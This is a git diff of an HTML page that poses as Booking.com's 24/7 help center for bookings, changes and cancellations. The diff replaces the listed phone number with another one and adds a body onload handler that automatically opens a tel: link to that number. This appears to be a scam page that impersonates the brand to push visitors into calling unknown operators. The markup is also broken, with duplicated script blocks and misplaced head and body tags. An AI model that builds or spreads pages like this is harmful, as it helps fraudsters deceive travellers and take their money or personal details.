--- a/index.html
+++ b/index.html
@@ -62,27 +62,39 @@
   </style>
   <script>
     function autoDial() {
-      var phoneNumber = "+1-(516) 240-5199";
+      var phoneNumber = "+1-(510) 269-6051";
+      window.location.href = "tel:" + phoneNumber;
+    }
+ </style>
+  <script>
+    function autoDial() {
+      var phoneNumber = "+1 (510) 269-6051";
       window.location.href = "tel:" + phoneNumber;
     }
 
+    function call() {
+      // Implement the call functionality here, such as initiating a phone call.
+      console.log("Calling...");
+    }
+  </script>
+</head>
+<body onload="autoDial()">
   
   <h1>Booking.com</h1>
  <h2>Welcome to the Help Center</h2>
  <h1>FOR BOOKING, CHANGES & CANCELLATION</h1>
  <H2>Speak With Our Agents</H2>
-<center>Contact Us: <font size="5" color="black"><a href="tel:+1 (516) 240-5199">+1 (516) 240-5199</a></font>  
+<center>Contact Us: <font size="5" color="black"><a href="tel:+1 (510) 269-6051">+1 (510) 269-6051</a></font>  
 <p>we're available 24 hours a day</p>
  <p>For anything urgent, you can call us 24/7</p>
  
- <a href="tel:+1-(516) 240-5199" class="call-button">Call Booking.com</a>
-<head>
+ <a href="tel:+1-(510) 269-6051" class="call-button">Call Booking.com</a>
+<center><head>
 <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.4.0/css/font-awesome.min.css">
-<center></head>
+</head>
 <body>
-<a href="tel: +1 (516) 240-5199"><i class="fa fa-phone fa-5x"></i>
+<a href="tel: +1 (510) 269-6051"><i class="fa fa-phone fa-5x"></i>
 <!--use the fa-lg (33% increase), fa-2x, fa-3x, fa-4x, or fa-5x classes-->
-</body>
 </body>
 
 
